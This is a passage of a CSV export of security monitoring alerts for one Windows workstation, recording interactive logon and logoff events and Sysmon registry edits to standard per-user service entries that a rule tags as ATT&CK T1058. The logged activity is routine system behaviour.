unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:11:01.845",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x89940 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:11:01.789",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x899DF + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:11:01.580",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x899DF + Linked Logon ID: 0x89940 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:11:01.503",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x89940 + Linked Logon ID: 0x899DF + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:57.259",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:51.143284900Z"",""eventRecordID"":""3372"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:51.027\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:51.027"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:51.027 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.963",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.728061800Z"",""eventRecordID"":""3366"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.910",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.727654900Z"",""eventRecordID"":""3365"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_69cbe\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_69cbe\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_69cbe\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:10:56.877",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.725899200Z"",""eventRecordID"":""3364"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.804",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.725538600Z"",""eventRecordID"":""3363"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.702",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.724188600Z"",""eventRecordID"":""3362"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_69cbe\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.608",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.723872200Z"",""eventRecordID"":""3361"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.502",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.722835500Z"",""eventRecordID"":""3360"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 13:10:56.431",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.722604400Z"",""eventRecordID"":""3359"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.699\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.699"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.699 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.369",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.721433300Z"",""eventRecordID"":""3358"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.280",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.721205600Z"",""eventRecordID"":""3357"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.245",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.720138200Z"",""eventRecordID"":""3356"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.204",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.719882000Z"",""eventRecordID"":""3355"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_69cbe\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_69cbe\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:10:56.151",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.717507500Z"",""eventRecordID"":""3354"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: 